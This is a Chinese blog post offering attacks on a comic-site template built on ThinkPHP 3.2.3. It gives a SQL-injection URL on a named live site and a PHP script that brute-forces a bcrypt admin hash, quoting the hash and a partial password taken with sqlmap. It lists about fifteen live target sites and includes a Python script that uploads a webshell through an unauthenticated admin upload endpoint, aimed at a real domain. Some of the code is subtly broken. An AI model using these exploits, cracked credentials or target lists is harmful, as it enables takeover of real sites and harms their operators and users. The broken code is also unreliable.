分类 工具下载 下的文章

歪歪漫画前台注入


tp3.2.3的框架 通杀漏洞
http://www.xxmh520.com/home/book/index/id/13559*
漫画目录id过滤不严谨造成的注入 后台 admin或者admin.php
但是上个文章说到 用的是password_hash来加密的
验证的话呢 就是password_verify
如果有头铁的大哥想试试猜组合密码的话 附上以下php脚本

<?php 
function randomkeys($length) {
    $returnStr='';
    $pattern = '1234567890';   //随机数可以自己添加
    for($i = 0; $i < $length; $i ++) {
        $returnStr .= $pattern {mt_rand ( 0, 10 )}; //生成php随机数
    }
    return $returnStr;
}
for ($i=0; $i < 200; $i++) {  //循环几次
    $hash = '$2y$10$wdFK9JBse5HoOGbihwR.q.YXcmC44i3owBckvMhV06gmLvG5UlRHO';  //这个值呢 是SQL注入之后sqlmap里面获取管理员的密码值出来的  aa654339
    $login = "aa65433".randomkeys(1); //输出几位
    if (password_verify($login,$hash)) {
        echo $login."成功";
        exit();
    }else{
        echo $login.randomkeys(1)."n";
    }

}


 ?>

如果遇到乱码 请在cmd执行 chcp 65001
下面送一波采集的站

http://www.gomh555.com/
http://www.wap.hgmh12.com/
http://hgdm5.com/
http://papamhw.com/
http://xxmh.me/
http://manhua.ww01.net/
http://yymh228.com/
http://www.wwhanman.com/
http://17z.me/
http://99ymh.com/
http://k03.me/
https://www.ihgmh.com/
http://www.wy555.cn/
http://yy.ue321.cn/
http://www.xxmh520.com/

歪歪漫画前台无限制getshell


这是一个前段时间拿到的一个getshell
由于网站用户是用password_hash解不开 所以现在才发出来
需要安装requests库
用法:python 文件名.py

import requests
import json
from urllib.parse import urlparse

def upload_shell(url):
    #vn_url="http://www.wap.hgmh12.com/admin/FileUpload/uploadfile"
    vn_url = url + "/admin/FileUpload/uploadfile"
    files={"file":("t00ls.php",open("t00ls.php","rb"))}
    try:
        res=requests.post(vn_url,files=files)
        res=res.json()
        domain = urlparse(vn_url)
        domain = domain.scheme+"://"+domain.netloc
        shell_address = domain + res"data"
        shell_code = requests.get(shell_address).status_code
        if shell_code == 200:
            print("[+] Success Url:%s"%shell_address)
            filename = 'shell.txt'
            with open(filename, 'w') as file_object:
                file_object.write("Success Url:%s"%shell_address%"密码:pass")
        elif shell_code == 500 :
            print("[-] Shell is 500 %s" % shell_address)
        elif shell_code == 404:
            print("[-] Faild Error")
    except Exception as e:
        print(e)
    
    



upload_shell("https://www.yymh556.com/")